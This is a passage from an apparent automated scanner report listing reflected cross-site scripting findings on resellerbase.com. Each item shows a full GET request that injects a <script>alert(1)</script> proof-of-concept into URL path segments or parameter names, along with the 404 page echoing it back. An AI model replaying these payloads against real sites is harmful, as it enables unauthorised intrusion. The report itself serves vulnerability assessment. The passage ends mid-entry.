Date: Wed, 17 Nov 2010 23:03:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail79837<script>alert(1)</script>c1a5c6f1d91/6/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3497. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2caa8<script>alert(1)</script>6645676b720 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/62caa8<script>alert(1)</script>6645676b720/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/62caa8<script>alert(1)</script>6645676b720/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3498. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 515c8<script>alert(1)</script>f31f3adb830 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes515c8<script>alert(1)</script>f31f3adb830/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes515c8<script>alert(1)</script>f31f3adb830/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3499. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7142a<script>alert(1)</script>a4f038f7db6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos7142a<script>alert(1)</script>a4f038f7db6/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos7142a<script>alert(1)</script>a4f038f7db6/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3500. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b2a11<script>alert(1)</script>5ad1b9e8f0d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/imagesb2a11<script>alert(1)</script>5ad1b9e8f0d/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/imagesb2a11<script>alert(1)</script>5ad1b9e8f0d/rating/ was not found on this server.</p>
...[SNIP]...

2.3501. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload bbaf9<script>alert(1)</script>91b5d4e03d5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images/ratingbbaf9<script>alert(1)</script>91b5d4e03d5/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/ratingbbaf9<script>alert(1)</script>91b5d4e03d5/ was not found on this server.</p>
...[SNIP]...

2.3502. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4cd96<script>alert(1)</script>e29d5c7e992 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images/rating/?4cd96<script>alert(1)</script>e29d5c7e992=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/rating/?4cd96<script>alert(1)</script>e29d5c7e992=1 was not found on this server.</p>
...[SNIP]...

2.3503. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/4.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4ff08<script>alert(1)</script>82971ed67c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4ff08<script>alert(1)</script>82971ed67c8/6/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:23:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4ff08<script>alert(1)</script>82971ed67c8/6/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3504. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/4.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6975e<script>alert(1)</script>1cd16526d05 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/66975e<script>alert(1)</script>1cd16526d05/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:23:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/66975e<script>alert(1)</script>1cd16526d05/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3505. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/4.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1812c<script>alert(1)</script>82f2a5f1cc4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes1812c<script>alert(1)</script>82f2a5f1cc4/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:24:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes1812c<script>alert(1)</script>82f2a5f1cc4/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3506. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/4.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 51423<script>alert(1)</script>4870c7dcaf5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos51423<script>alert(1)</script>4870c7dcaf5/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:24:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos51423<script>alert(1)</script>4870c7dcaf5/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3507. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/4.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 74c59<script>alert(1)</script>df4247a29aa was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images74c59<script>alert(1)</script>df4247a29aa/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:24:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images74c59<script>alert(1)</script>df4247a29aa/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3508. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/4.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ed7a1<script>alert(1)</script>3059487b008 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images/ratinged7a1<script>alert(1)</script>3059487b008/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:24:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/ratinged7a1<script>alert(1)</script>3059487b008/4.gif was not found on this server.</p>
...[SNIP]...

2.3509. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/4.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload fd26d<script>alert(1)</script>57caed670ae was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images/rating/4.giffd26d<script>alert(1)</script>57caed670ae HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:25:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/rating/4.giffd26d<script>alert(1)</script>57caed670ae was not found on this server.</p>
...[SNIP]...

2.3510. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/4.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/4.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1a297<script>alert(1)</script>c49edf71fe6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images/rating/4.gif?1a297<script>alert(1)</script>c49edf71fe6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:23:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/rating/4.gif?1a297<script>alert(1)</script>c49edf71fe6=1 was not found on this server.</p>
...[SNIP]...

2.3511. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 72c0a<script>alert(1)</script>c24acb601e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail72c0a<script>alert(1)</script>c24acb601e6/6/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail72c0a<script>alert(1)</script>c24acb601e6/6/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3512. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ff520<script>alert(1)</script>d5224d59aec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6ff520<script>alert(1)</script>d5224d59aec/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6ff520<script>alert(1)</script>d5224d59aec/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3513. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e70a2<script>alert(1)</script>ebaf3a3a5d4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themese70a2<script>alert(1)</script>ebaf3a3a5d4/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themese70a2<script>alert(1)</script>ebaf3a3a5d4/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3514. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload becc7<script>alert(1)</script>b132f8ae1b5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmosbecc7<script>alert(1)</script>b132f8ae1b5/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmosbecc7<script>alert(1)</script>b132f8ae1b5/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3515. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c1885<script>alert(1)</script>e52b246e872 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/imagesc1885<script>alert(1)</script>e52b246e872/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

